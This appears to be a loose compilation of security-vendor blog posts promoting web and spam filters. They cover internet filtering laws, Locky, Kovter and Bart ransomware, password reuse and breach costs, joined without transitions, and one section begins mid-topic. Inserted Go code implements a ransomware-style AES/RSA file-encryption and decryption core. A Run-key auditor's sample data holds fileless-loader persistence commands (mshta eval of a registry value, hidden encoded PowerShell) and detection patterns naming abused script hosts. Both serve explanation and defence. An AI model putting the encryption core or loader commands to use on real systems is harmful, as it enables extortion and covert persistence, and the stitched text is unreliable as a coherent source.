Along with advanced threat prevention technologies, application controls, intrusion prevention systems, and good patch management policies, it is possible to prevent the vast majority of malware attacks. However, with the volume of malware now being released and the extent to which hackers are attacking organizations, failing to commit to improving cybersecurity defenses is likely to see organizations become another breach statistic.
The American Civil Liberties Union (ACLU) of Rhode Island has praised the General Assembly for introducing more transparent standards for the use of Internet filters in schools in the state.
Since the passing of the Children’s Internet Protection Act (CIPA), K-12 schools and libraries that apply for E-Rate discounts have been required to implement a web filter to restrict access to inappropriate or harmful website content. The web filter must be configured to block obscene images, child pornography, and other content that could be considered harmful to minors.
Overzealous Use of School Internet Filters in Rhode Island
While schools in Rhode Island have complied with CIPA, many have gone further and have used Internet content filtering software to block far more website content than CIPA requires. Blocking potentially harmful website content protects children from harm; however, schools must take care not to overblock website content.
There is a clear difference between pornographic content which contains images of naked individuals and artwork which depicts nudes for example. The former has potential to cause harm to minors, the latter has educational value and should not be blocked. If there are no standards for the use of Internet filters in schools, it is all too easy for valuable educational material to be inadvertently blocked.
Three years ago the ACLU published a report on how overblocking of website content can harm public education. The report details some of the difficulties staff and students have had accessing valuable website content after web filtering solutions have been implemented in educational establishments in Rhode Island.
Internet filters allow website content to be blocked based on categories. Schools may, for instance, choose to block content relating to alcohol. However, the report says some students had tried searching for polyvinyl alcohol – information on which was required for their studies, yet the content was not accessible because the Internet filtering category “alcohol” had been blocked.
Students who want to access LGBT information or individuals wishing to find out about sexually transmitted diseases should be able to access that information, yet this type of website content can all too easily be blocked if Internet filters are not carefully applied. The ACLU believes that transparent standards for the use of Internet filters in schools are necessary. Schools should be open about the type of content that they block and the reasons for doing so. With greater transparency students can be protected from harm, yet have access to valuable educational material.
New Standards for the Use of Internet Filters in Schools in Rhode Island
Rep. Art Handy and Sen. Adam Satchell sponsored the new bills (H-7583-A and S-2172-A), which require the state Department of Education and school districts to implement written policies explaining the categories of website content they block and the reasons for blocking each category. Policies must also be reviewed on an annual basis.
Hillary Davis, policy associate of the ACLU of Rhode Island, praised the introduction of new standards for the use of Internet filters in schools by the General Assembly. She said, “The Internet offers a world of educational opportunities that Rhode Island’s students have been denied because of overzealous filtering software.” Davis went on to say, “This new law will go a long way toward ensuring teachers can bring their full range of resources to the classroom, and that students can complete their studies without interruption or frustration.”
McDonalds and Starbucks have recently announced that they have taken steps to block porn on the WiFi networks they provide to customers. McDonalds restaurants in the United States already have a web filtering solution in place that prevents customers from accessing pornographic material via the in-restaurant WiFi networks. Mature content that is not pornographic – streaming of TV shows such as Game of Thrones, for example – remains accessible. Starbucks has followed McDonalds’ lead and will soon implement a web filtering solution to block pornography.
McDonalds is the largest fast-food chain in the United States, operating more than 14,000 restaurants. Starbucks is the largest coffee shop chain in the United States, with more than 12,200 outlets in the U.S. Due to the size of the chains, and their popularity with children and families, both organizations have faced pressure from Internet safety organizations to start implementing controls to limit the website content that can be accessed via their WiFi networks.
McDonalds Chooses to Block Porn on WiFi Networks in its Restaurants
McDonalds started to block porn on WiFi networks available to customers earlier this year. According to a statement issued by the fast-food chain, the corporation was previously unaware that there was a problem with customers accessing pornography inside its restaurants or that consumers wanted restrictions to be placed on its WiFi networks.
After the not-for-profit Internet safety organization Enough is Enough reached out to the CEO of McDonalds last year and suggested WiFi network porn filtering should be implemented, the fast-food chain reacted “promptly and positively.”
McDonalds recently issued a statement saying “We had not heard from our customers that this was an issue, but we saw an opportunity that is consistent with our goal of providing an enjoyable experience for families.”
McDonalds started exploring web filtering solutions to block pornography on WiFi networks in its restaurants and, after researching the available options, McDonalds implemented a WiFi network porn filtering solution in Q1, 2016. Last week, McDonalds announced that a web filtering solution had been deployed to block porn on WiFi networks in its restaurants.
WiFi Network Porn Filtering to be Implemented by Starbucks
Hot on the heels of the announcement by McDonalds was a press release confirming that Starbucks had taken the decision to block porn on WiFi networks in its coffee shops.
Two days after the McDonalds announcement, Enough is Enough reported that Starbucks had also opted to block porn on WiFi networks in its coffee shops in the United States. When the evaluation process has been completed, and a suitable WiFi network porn filtering solution has been selected, it will be rolled out worldwide across the company´s coffee shops to ensure that all customers are protected from exposure to pornographic material.
A spokesperson for Starbucks said, “We are in the process of evaluating a global protocol to address this in all of our company owned stores, and are in active discussions with organizations on implementing the right, broad-based solution that would remove any illegal and other egregious content.”
Enough is Enough has been campaigning for safer Internet since the group was formed in 1994. In 2014 the organization launched a new campaign to place pressure on corporations in America to use WiFi network porn filtering to ensure that children and families could access the Internet safely without being exposed to pornographic material.
Increasing Pressure on Corporations to Implement WiFi Filtering Solutions to Block Pornography
Enough is Enough claim “Internet safety is now the fourth top-ranked health issue for U.S. children with peer-reviewed research confirming Internet pornography as a public health crisis.” The organization says that individuals are increasingly using open WiFi networks to gain access to online pornography and child pornography. They cite news reports that public WiFi networks are also being used by individuals to share obscene, abusive, and illegal images.
Enough Is Enough has been putting an increasing amount of pressure on organizations in the United States over the past two years to carefully control the content that can be accessed via WiFi networks. The organization has now gained the support of 75 partner organizations including the Salvation Army, National Coalition to Protect Child Sexual Abuse, U.S. Department of Justice, American Family Association (AFA), Family Research Council (FRC), and the National Center on Sexual Exploitation.
Enough is Enough and the National Center on Sexual Exploitation recently appealed to Starbucks to follow the lead of McDonalds and implement a WiFi web filtering solution to block porn on WiFi networks accessible to its customers.
Both organizations will now be increasing their efforts to get other corporations in the United States to make a similar decision and block porn on WiFi networks in order to provide family-friendly Internet access.
New Locky ransomware variants are frequently developed to keep security researchers on their toes. The malicious ransomware is highly sophisticated and further development allows the gang behind the crypto-ransomware to keep raking in millions of dollars in ransoms.
According to security researchers at Avira, a new Locky variant has now been discovered with new capabilities that spell trouble for businesses, even those with highly advanced security systems in place. Now, even rapid detection of Locky will not prevent files from being encrypted. Even if Locky cannot contact its command and control server, it will still execute and encrypt files. Previous Locky ransomware variants would only encrypt files after C&C server contact was established.
This means that if Locky is detected on a computer, isolating the machine from the network or blocking its communications will not prevent files from being encrypted. That was one of the few options open to organizations to limit the damage once ransomware is discovered.
New Locky Ransomware Variants Encrypt Without C&C Server Contact
Many of the latest ransomware strains use public key cryptography to lock users’ files. Typically the malware contacts a C&C server, which generates a unique public-private key pair for that infection and returns only the public key; the files, or the per-file AES keys, are then encrypted with it. The private key needed to unlock the files stays on the attacker’s server and is never present on the infected machine. If a system is taken offline before that exchange completes, no key is obtained and the files are not encrypted.
Without that connection, a unique key cannot be generated for each victim. A sample that falls back to a public key embedded in its own binary locks every offline victim with the same key, so even if millions of computers were locked, one private key would unlock them all. Generating a unique key per infection is what forces a ransom to be paid for each encrypted device; without it, a business would only need to pay once to unlock all infected devices.
Fortunately, that is the case with the latest Locky strain when it cannot reach its C&C server: all infected devices are locked with the same embedded key, so only one ransom payment may need to be made. If C&C contact is established, however, the AES encryption key is encrypted with a separate RSA key for each device and multiple payments will be required.
Avira reports that the new Locky ransomware variants use different victim ID formats depending on whether files were encrypted offline or online. Offline infections use a 32-character alphabet for the victim IDs – “YBNDRFG8EJKMCPQX0T1UWISZA345H769” – rather than hex digits. This lets the attackers determine which key to supply to unlock the files.
According to Avira’s Moritz Kroll, “Theoretically, if a company with a domain controller is hit by the new Locky and sees a non-hexdigit ID like ‘BSYA47W0NGXSWFJ9’, it might be cheaper to generate a victim ID with the same public key ID but without saying it’s a corporate computer.” That key can then be used for all other devices that have been infected.
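To make the key-handling difference concrete, here is an added example (written for this page; not Avira’s code, not Locky’s, and not code from the original article) that models the hybrid scheme in Go: a per-victim AES key wrapped to an RSA public key, with offline infections all sharing the public key embedded in the sample and online infections each getting a key the C&C mints. It also implements the victim-ID distinction Avira describes. The primitives (RSA-OAEP, AES-256-GCM), the victim IDs and the documents are this example’s own choices and constructed data, not Locky’s exact implementation.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"strings"
)

// Victim is what the scheme leaves on one machine: the encrypted file, the
// per-victim AES key wrapped to an RSA public key, and the ransom-note ID.
// The matching RSA private key is never on the machine.
type Victim struct {
	ID         string
	Pub        *rsa.PublicKey
	WrappedKey []byte
	Ciphertext []byte
}

// NewKeyPair stands in for the pair behind the public key baked into the
// sample (offline mode) and for the pair the C&C mints per infection (online).
func NewKeyPair() *rsa.PrivateKey {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return priv
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Infect encrypts one file on one machine: fresh AES-256 key wrapped with pub
// via RSA-OAEP, AES-GCM over the file with the nonce prepended. An offline
// sample passes its embedded key, an online one the key its C&C just issued;
// nothing else differs. (Primitive choices are this example's, not Locky's.)
func Infect(pub *rsa.PublicKey, id string, file []byte) (Victim, error) {
	buf := make([]byte, 32+12) // AES-256 key followed by a 96-bit GCM nonce
	if _, err := rand.Read(buf); err != nil {
		return Victim{}, err
	}
	key, nonce := buf[:32], buf[32:]
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, key, nil)
	if err != nil {
		return Victim{}, err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return Victim{}, err
	}
	ct := gcm.Seal(nonce, nonce, file, nil)
	return Victim{ID: id, Pub: pub, WrappedKey: wrapped, Ciphertext: ct}, nil
}

// DecryptFile is the operator's decryptor: unwrap the AES key with the RSA
// private key, then open the file. The wrong private key fails at OAEP.
func DecryptFile(priv *rsa.PrivateKey, v Victim) ([]byte, error) {
	key, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, v.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if ns := gcm.NonceSize(); len(v.Ciphertext) >= ns {
		return gcm.Open(nil, v.Ciphertext[:ns], v.Ciphertext[ns:], nil)
	}
	return nil, fmt.Errorf("ciphertext too short")
}

// RansomsNeeded counts distinct wrapping keys across infected machines: the
// number of private keys, and therefore payments, needed to recover them all.
func RansomsNeeded(victims []Victim) int {
	seen := map[string]bool{}
	for _, v := range victims {
		seen[v.Pub.N.String()] = true
	}
	return len(seen)
}

// ClassifyVictimID applies Avira's observation: hex IDs come from online
// infections, IDs over YBNDRFG8EJKMCPQX0T1UWISZA345H769 from offline ones.
// That alphabet also holds 0, 1, 3-9 and A-F, so an offline ID can by chance
// look like hex; "online" is a heuristic, not proof.
func ClassifyVictimID(id string) string {
	id = strings.ToUpper(id)
	switch {
	case id == "":
		return "unknown"
	case strings.Trim(id, "0123456789ABCDEF") == "":
		return "online"
	case strings.Trim(id, "YBNDRFG8EJKMCPQX0T1UWISZA345H769") == "":
		return "offline"
	}
	return "unknown"
}

func main() {
	embedded, online := NewKeyPair(), NewKeyPair()
	a, _ := Infect(&embedded.PublicKey, "BSYA47W0NGXSWFJ9", []byte("doc 1")) // constructed IDs
	b, _ := Infect(&embedded.PublicKey, "Y8EJKMCPQX0T1UWI", []byte("doc 2"))
	c, _ := Infect(&online.PublicKey, "1F4A9C0B2D3E5F67", []byte("doc 3"))
	for _, v := range []Victim{a, b, c} {
		_, err := DecryptFile(embedded, v)
		fmt.Println(v.ID, ClassifyVictimID(v.ID), "opened by embedded key:", err == nil)
	}
	fmt.Println("ransoms needed:", RansomsNeeded([]Victim{a, b, c})) // 2: a and b share one key
}
```

Run with go run: the private key behind the embedded public key opens both offline victims and fails on the online one, and RansomsNeeded reports 2 for the three machines. ClassifyVictimID is a triage aid for the situation Kroll describes; as the comment notes, an offline ID drawn from that alphabet can occasionally consist only of hex characters, so a hex ID should be checked against the sample’s behaviour before concluding that a separate key was issued.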
While this may work, it is no substitute for having a viable backup. It is also far better to block the malicious spam emails that are used to deliver the ransomware using an advanced spam filtering solution such as SpamTitan, and to prevent drive-by downloads using WebTitan.
If you want to keep your computers and network protected, you should ensure that browsers are patched as soon as updates are made available. However, end users who believe they are doing exactly that can be fooled into installing fake Firefox updates.
Fake Firefox Updates Used to Install the Kovter Trojan
Fake Firefox updates are being used by the gang behind the Kovter Trojan. A new version of the fileless malware has been identified recently, and it is infecting users by posing as a fake Firefox update.
The cybercriminal gang behind Kovter frequently tweaks the malware and comes up with new ways of infecting end users. Kovter is a particular worry because it is hard to detect. Being fileless, it leaves no executable on disk for antivirus software to scan: the malware resides only in memory and relies on a Windows registry entry to be reloaded into memory each time the computer is rebooted.
Kovter can perform a range of malicious activities, such as redirecting users to malicious websites, performing click fraud, downloading other malware, and now also encrypting files. The latest variant discovered by Check Point also has ransomware capabilities.
When users visit a malicious or infected website they are presented with fake Firefox updates and are urged to download the latest version to keep their computers secure. Researchers at Barkly discovered that the gang behind the latest Kovter campaign is using a legitimate code-signing certificate to fool antivirus engines. The certificate was issued by Comodo and has since been revoked. Antivirus engines are also now being updated to detect the malware and block its download.
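The registry-based persistence described above gives defenders something to hunt for even when there is no file on disk. The following is an added example, written for this page rather than taken from Barkly, Check Point or the original article, that audits the text of a reg export of the Run and RunOnce keys for entries that start a script host with inline code or point it at a registry value. The key paths are the real autorun locations; the export content, value names and payloads are constructed, and the regular expressions are this example’s own heuristics.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// Finding is one autorun entry whose command does not simply start an
// executable on disk but hands a script host inline code, or points it at the
// registry: the shape a fileless loader uses to get back into memory at boot.
type Finding struct {
	Key, Name, Command, Reason string
}

var (
	// Script hosts and proxies a fileless loader typically borrows. Heuristic
	// list for this example; extend it for your estate.
	scriptHosts = regexp.MustCompile(`(?i)\b(mshta|powershell|pwsh|wscript|cscript|regsvr32|rundll32)(\.exe)?\b`)
	// Inline-code markers: protocol-handler scripts, encoded commands, eval helpers.
	inlineCode = regexp.MustCompile(`(?i)(javascript:|vbscript:|about:|-enc(odedcommand)?\s|-e\s|iex\s|invoke-expression|activexobject|getobject)`)
	// The command reaches into the registry for its payload.
	registryRef = regexp.MustCompile(`(?i)\b(hkcu|hkey_current_user|hklm|hkey_local_machine)\\`)
)

// AuditRunKeys scans the text of a registry export (the format "reg export"
// writes) and returns the entries under Run/RunOnce keys worth a second look.
func AuditRunKeys(regExport string) []Finding {
	var findings []Finding
	key := ""
	sc := bufio.NewScanner(strings.NewReader(regExport))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if strings.HasPrefix(line, "[") && strings.HasSuffix(line, "]") {
			key = line[1 : len(line)-1] // new key section
			continue
		}
		if !strings.Contains(strings.ToLower(key), `\currentversion\run`) { // Run, RunOnce
			continue
		}
		name, cmd, ok := splitRegValue(line)
		if !ok {
			continue
		}
		if reason := assess(cmd); reason != "" {
			findings = append(findings, Finding{Key: key, Name: name, Command: cmd, Reason: reason})
		}
	}
	return findings
}

// splitRegValue parses a "Name"="value" line, undoing the .reg escaping of
// backslashes and quotes. Non-string values (dword:, hex:) are skipped.
func splitRegValue(line string) (name, value string, ok bool) {
	i := strings.Index(line, `"="`)
	if !strings.HasPrefix(line, `"`) || !strings.HasSuffix(line, `"`) || i < 0 || i+3 > len(line)-1 {
		return "", "", false
	}
	raw := line[i+3 : len(line)-1]
	return line[1:i], strings.NewReplacer(`\"`, `"`, `\\`, `\`).Replace(raw), true
}

func assess(cmd string) string {
	switch {
	case !scriptHosts.MatchString(cmd):
		return "" // a plain executable path; out of scope for this heuristic
	case inlineCode.MatchString(cmd):
		return "script host started with inline code"
	case registryRef.MatchString(cmd):
		return "script host pointed at a registry value"
	}
	return "script host in autorun; confirm the script file exists and is signed"
}

// sampleExport is a constructed "reg export" of the two Run keys: two ordinary
// entries and two shaped like a fileless loader's persistence. Value names
// and payloads are made up for the example.
const sampleExport = `Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"a1b2c3"="mshta \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\a1b2c3\\\\payload'))\""
"Updater"="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
`

func main() {
	for _, f := range AuditRunKeys(sampleExport) {
		fmt.Printf("%s\n  %s = %s\n  -> %s\n", f.Key, f.Name, f.Command, f.Reason)
	}
}
```

On Windows, produce the input with reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg (and the HKLM equivalent); reg export writes UTF-16LE with a byte-order mark, so convert the file to UTF-8 first (PowerShell’s Get-Content -Encoding Unicode, or iconv -f UTF-16LE -t UTF-8) before feeding it to the scanner. The two flagged entries are the ones that never touch a script file on disk. A complete hunt would also cover the other autostart locations (services, scheduled tasks, file-association handlers) that Sysinternals Autoruns enumerates.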
Preventing Drive by Malware Downloads
There are a number of steps that can be taken to prevent drive-by downloads of malware such as Kovter. Policies should be implemented that prohibit end users from performing software updates, which should be left to the IT team to handle. Patch management policies should be developed and implemented to make sure that when software updates and patches are issued, they are installed promptly or preferably automatically.
Browsers should never be updated outside the normal update process. To check if the latest version is installed, simply click on the help function, followed by the About option, and the browser will check to determine whether an update is available.
A web filtering solution is also an important security control to employ to prevent drive-by downloads. A web filter can be configured to block access to webpages known to contain malware and restrict access to non-work related websites which carry a high risk of malware infections. Some web filtering solutions – WebTitan Gateway for example – can also scan websites in real-time to check for known indicators of drive-by downloads and exploit kits. WebTitan then prevents the sites from being visited.
A bill that would require government agencies to block pornography on computers used by federal employees has been approved by the House of Representatives.
The accessing of pornography in the workplace is a serious issue. While the employees who access the adult material at work may feel like they are doing no harm, the accessing of adult websites carries an unnecessary risk of malware being downloaded onto computers and government networks. The recent massive data breaches experienced by government agencies have highlighted the need for improved protections to be implemented.
Eliminating Pornography from Agencies Act Passed by House
Rep. Gary Palmer (R-Alabama) sponsored the bill – the Eliminating Pornography from Agencies Act (H.R. 901) – which is part of a new government reform package. Palmer saw a need for new legislation to block pornography on computers after it became clear that the problem was widespread in federal agencies.
Federal workers were suspected of accessing pornography at work and internal investigations revealed that a number of workers had been accessing sexually explicit material; in some cases, for many hours each day.
One notable instance involved a worker who was suspected of accessing pornography on a federal computer. When EPA Office of the Inspector General (OIG) investigators visited the employee, he was actually viewing pornography at the time. He admitted to accessing the material for two to six hours a day.
The Securities and Exchange Commission (SEC) OIG also conducted investigations. A 2010 report indicated 33 employees had been discovered to be accessing pornography at work. Last year, media reports suggested there was a porn crisis in the federal government, saying the problem was serious and widespread.
Aside from the huge drain on productivity, if an agency fails to block pornography on computers there is a considerable risk of employees infecting their computers with malware or causing a data breach.
The reform bill passed 241-181. If enacted, it will require agencies to block pornography on computers for all workers, although access will still be permitted for certain individuals who require access to the material as part of their investigations.
WebTitan – A Quick and Effective Way to Block Pornography on Computers
WebTitan is a highly effective, but easy to implement web filtering solution that can be used to quickly block a wide range of inappropriate web content from being accessed by employees. WebTitan is an enterprise-class web filter that allows organizations to block specific categories of web content such as pornography.
Once the solution is installed, to block pornography on computers system administrators only have to tick a checkbox. Websites and webpages containing pornographic images will no longer be able to be accessed by employees. Since WebTitan ties in with Active Directory, it is easy for different permissions to be set for individuals, user groups, or for the entire organization.
Filters can also be applied to block productivity-draining websites such as social media platforms, gambling websites, and gaming sites. Bandwidth-draining activities such as video and audio streaming can also be blocked, as can websites known to contain exploit kits or malware.
WebTitan can be used to quickly and easily enforce acceptable usage policies and improve the productivity of the workforce as well as an organization’s security posture.
Mobile ransomware may not be nearly as prevalent as its PC counterpart, but attacks on mobile devices are on the rise according to a new report issued by anti-virus firm Kaspersky Lab.
Kaspersky Lab assessed thwarted ransomware attacks on mobile users over a period of two years and saw that the share of mobile malware attacks involving ransomware more than doubled, signifying a worrying new trend.
Between 2014 and 2015, 2.04% of malware attacks on mobile users involved ransomware. Between 2015 and 2016, the percentage of ransomware attacks rose to 4.63%. During that period, 136,532 attacks took place.
Kaspersky Lab noted that the ransomware used to infect mobile devices differs considerably from the strains used to infect PC users. While Locky, CryptXXX, and RAA are now the main threats affecting PCs, the main mobile ransomware strains currently being used are Fusob, Small, Svpeng, and Pletor.
Mobile ransomware tends not to use encryption to lock files, instead malicious software is developed that blocks users from accessing their device. Oftentimes, this is achieved with a simple HTML overlay. Encryption is more effective on PCs because many users fail to back up their data, or when they do they leave their backup devices connected. Many strains of PC ransomware are able to delete backup files or encrypt them, leaving end users with no alternative but to pay the ransom or lose their data forever.
Many mobile users automatically back up their data in the cloud. If data is ever lost or encrypted, files can easily be recovered. However, overlays prevent the user from accessing their files from the device. With mobile devices, victims cannot simply take out a hard drive, plug it into another machine, and manually remove the malicious files. If an infection takes place, users either have to pay the ransom or replace their device. Provided the ransom is lower than the cost of a replacement, many users will end up paying.
Without the need for encryption, the development of mobile ransomware is considerably cheaper. The ransoms that can be demanded may be lower than for PC infections, but campaigns can be highly profitable for cybercriminals.
Criminal gangs are also using an affiliate model to spread infections. There is usually no shortage of actors willing to invest the time distributing the malicious software in exchange for a cut of the ransom. In many cases, signing up for these affiliate ransomware campaigns is easy. The developers of the malware release kits to make it as easy as possible. Programming skill is not even needed.
Mobile Ransomware Attacks Will Continue
The use of mobile ransomware is increasing significantly because it is effective. An increasing amount of data is now stored on mobile devices, and end users – and business users in particular – are unwilling to lose their data. As long as ransoms are paid, attacks will continue and are likely to increase. Cybercriminals will only stop developing new mobile ransomware strains when the campaigns prove to be ineffective and unprofitable.
A new threat has recently been discovered by security researchers at PhishMe: Bart ransomware. The new ransomware variant is not as sophisticated as Locky or SamSam, but it is still highly effective and poses a risk to businesses. Should end users be fooled into opening the malicious attachments, files can only be recovered from backups unless the ransom is paid.
Bart Ransomware Locks Files in Password-Protected ZIP Files
Bart Ransomware bears a number of similarities to other ransomware variants that have been discovered in recent months. If installed on a device, media files, photos, documents, spreadsheets, databases, and a host of other files are located and encrypted. Bart ransomware also encrypts .n64 ROM files, which was previously unique to Locky ransomware. Bart is also delivered using the same Dridex botnet that was used to deliver Locky.
Bart ransomware also uses a payment interface that looks very similar to Locky’s. However, there are notable differences from Locky and other ransomware variants. Bart demands a particularly high payment from its victims. Rather than the 0.5 Bitcoin more commonly demanded, Bart asks for 3 Bitcoin per infected machine – approximately $1,988 per device.
There are also notable differences in the method used to encrypt files. Bart does not use public key cryptography. Instead, each file is placed inside a password-protected ZIP archive. To unzip the files the password must be supplied, and it is only provided to the victim if the sizeable ransom is paid.
Bart also does not use the typical command and control infrastructure. Most new ransomware variants contact the attackers’ command and control server before files are encrypted, but that does not appear to happen with Bart, so blocking outbound traffic from an infected machine will not stop it.
New Ransomware Variant Delivered via Spam Emails
The ransomware has been developed to attack users in the West, and will not lock files if the operating system language is Russian, Ukrainian, or Belarusian.
To prevent infection, it is essential that end users do not open the infected email attachments. Since the emails may appear benign to end users, organizations should take steps to prevent the spam emails from being delivered. One way of doing this is to use SpamTitan. SpamTitan can be configured to block zip files and prevent them from being delivered to end users.
If spam emails are not delivered, end users will not be able to inadvertently infect their devices. Furthermore, the cost of deploying SpamTitan is likely to be considerably less than the cost of a single ransom payment to resolve a Bart infection.
There have been a number of high-profile data breaches reported in recent weeks; now Citrix has announced that its users have been affected after it received multiple reports of GoToMyPC password reuse attacks. An investigation into the attacks revealed that the account compromises were not the result of a Citrix data breach, but were made possible by the poor password practices of some of its users.
Passwords Reset After Spate of GoToMyPC Password Reuse Attacks
After discovering the GoToMyPC password reuse attacks, Citrix performed a password reset on all users’ accounts to reduce the risk of further account compromises. When users next log in to the remote desktop access service they will be required to set a new password before being allowed to access the service.
While Citrix has taken steps to protect its own users, simply changing passwords on GoToMyPC will not protect users who share passwords across multiple applications and web services. It is therefore important for users to log in to every other online account that uses the same password and to set a new, unique password for each.
Following the cyberattacks on LinkedIn, MySpace, and Tumblr, login credentials were openly sold on darknet marketplaces. Many individuals purchased the data and have been searching online platforms to find users that have accounts elsewhere. The same passwords are then tried to see if access can be gained.
Shortly after these data dumps, numerous Twitter accounts were hacked, including those belonging to a number of high profile celebrities – Katy Perry, Mark Zuckerberg, Tenacious D, and Lana Del Rey for example. While the hacking of a Twitter account may only be an inconvenience for many victims, far more serious hacks have occurred.
TeamViewer remote desktop connection software was targeted by attackers who had obtained data from the LinkedIn breach. Users’ accounts were accessed and the software leveraged to obtain access to users’ PayPal accounts and bank accounts, primarily using passwords saved in browsers. The victims had their bank and PayPal accounts emptied. Some individuals also reported that TeamViewer had been used to install ransomware on their computers.
Since many individuals share passwords on personal accounts and business accounts, the latter may also be compromised and that can have highly serious implications.
The Danger of Password Sharing
All organizations face a threat of cyberattacks and sooner or later it is likely that one of those attacks will be successful. If users’ login credentials are obtained, they can be used to access accounts on other web and software platforms.
The spate of recent attacks shows how dangerous it can be to use the same passwords for multiple accounts. While it is certainly convenient to use the same password on multiple platforms, users stand to have their entire online identity hijacked as a result of a single cyberattack on one company.
To limit the damage caused, it is essential to use a unique, complex password for each online account, never to recycle passwords, and to change passwords frequently (current guidance, it should be said, favours changing a password when there is reason to think it has been exposed rather than on a fixed schedule). Sys admins should ensure that password policies are set that require complex passwords to be created, and password expiration policies should also be developed and implemented. Password managers can be used to help end users keep track of all of their passwords.
RAA Ransomware Delivered via Spam Email
First, all drives – local, network, and portable – are scanned for specific file extensions, including documents and spreadsheets (DOC, RTF, XLS, CSV, PDF), compressed files (ZIP, RAR), image files (JPG, PSD, PNG, DWG, CDR, CD), database files (DBF, MDF), and LCD disk images.
The RAA ransomware is set to run automatically each time the computer is booted, and it installs Pony each time. Since the ransomware runs on boot, it will encrypt any files with the above extensions that have been created or downloaded since the last time it was executed. At present, there is no way of decrypting the files without paying the ransom.
To protect against attacks, end users must be vigilant and not open any file attachments sent by unknown individuals. Sys admins must also ensure that all files are regularly backed up and that backup devices are air-gapped.
The Ponemon Institute conducts an annual benchmark study on the cost of a data breach. The IBM-sponsored report reveals just how damaging data breaches can be to a company’s finances. Responding to a data breach costs companies millions of dollars, and each year the cost rises.
Last year, the Cost of a Data Breach study placed the average cost at $3.79 million. This year, the average cost has risen to $4 million. The average cost per stolen record rose from $154 to $158 over the past 12 months.
Average Cost of a Data Breach in the United States is $7.01 Million
However, those figures are taken from the global data collected for the study. The costs incurred by U.S businesses are much higher. Take the figures for the United States alone, and the average cost is $7.01 million. Last year the average cost of a breach response in the United States was $6.53 million.
Organizations in the United States can expect to pay costs of $221 per record, although organizations in the healthcare industry, financial, and life science sector can expect to pay far higher amounts. The cost of a data breach in the healthcare industry is a staggering $402 per record. The data also show that the average number of records exposed per incident also increased.
In the United States, the total cost of a data breach rose by 7% over the space of a year, and by 2% per stolen or compromised record. The Ponemon Institute offers some suggestions why the overall cost of a data breach has increased by such a high degree. One of the main reasons is a substantial rise in indirect costs. When an organization suffers a security breach that exposes sensitive data such as credit card numbers, financial information, Social Security numbers, or medical records, consumers are increasingly taking their business elsewhere. The Ponemon Institute refers to this as the abnormal churn rate.
Organizations Should Try to Reduce Churn Rate After a Data Breach
One of the findings of the research is that the higher the churn rate following a data breach, the higher the cost of the breach will be. Companies that experienced an abnormal churn rate of lower than 1% had to pay average breach costs of $5.4 million. The cost rose to $6.0 million with an abnormal churn rate of between 1% and 2%, while a churn rate of above 4% resulted in average costs of $12.1 million.
The industries most likely to see customers leave and find alternative companies to do business with were healthcare organizations, financial companies, service organizations, and companies operating in the technology and life sciences industries. Public sector organizations, research organizations, and the media experienced the lowest churn rates.
Ponemon suggests that one of the best ways to reduce the financial impact of a data breach is to put greater effort into retaining customers and adopting strategies to preserve brand value and reputation. Consumers now understand that data breaches are a fact of life, but they expect action to be taken by organizations that have suffered a breach that exposed their personal information. Issuing breach notifications quickly, offering credit monitoring services to affected individuals, and taking steps to greatly improve security can all help to reduce fallout after a data breach occurs.
Malicious Attacks Cost the Most to Resolve
All data breaches will result in organizations incurring costs, but the cause of a data breach will dictate how high those costs will be. Malicious attacks on organizations were discovered to cost the most to resolve. In the United States, the average cost per record for a malicious or criminal attack was $236. For system glitches the cost was $213 per record, and for human error the cost was $197 per record.
The costs incurred can be reduced significantly if organizations take steps to prepare for data breaches. The Ponemon Institute determined that having an effective breach response plan can greatly reduce the cost of a data breach. When an organization can respond quickly to a breach the costs tend to be much lower.
The average time to contain a data breach was determined to be 58 days. Organizations that were able to contain a data breach in less than 30 days paid an average cost of $5.24 million per breach, compared to $8.85 million when the time to contain the breach exceeded 30 days.
It also pays to invest in technologies that allow organizations to identify breaches quickly when they do occur. The mean time to identify a breach was determined to be 191 days – more than 6 months. When the mean time to identify a breach was less than 100 days, the breach cost was $5.83 million. When the mean time to identify a data breach exceeded 100 days, the mean cost rose to $8.01 million.
The costs of breach resolution are continuing to rise. Organizations should therefore consider investing more heavily in technologies to prevent data breaches and to increase the speed at which they are detected. The results of the study clearly demonstrate that having a tested breach response plan in place is essential if costs are to be reduced.
The security threat from bloatware was made abundantly clear last year with the discovery of a Lenovo bloatware vulnerability, affecting the Superfish Adware program that came pre-installed on Lenovo laptops.
Bloatware is a term used to describe software applications and programs that are largely unnecessary, yet are pre-installed on new computers and laptops. The software can slow down computers and consume a lot of memory, yet offers the user little in the way of benefits. It is typically there to push the vendor’s own applications and feature updates rather than to enhance security.
Unfortunately, these pre-installed programs have been discovered – on numerous occasions – to contain security vulnerabilities that can be exploited by malicious actors and used for man-in-the-middle attacks. They can even let attackers run arbitrary code, allow privilege escalation, or perform malicious software updates.
Now a new Lenovo bloatware vulnerability has been uncovered. This time it concerns the company’s software updater, which has been found to contain a vulnerability that could potentially be exploited to conduct man-in-the-middle attacks.
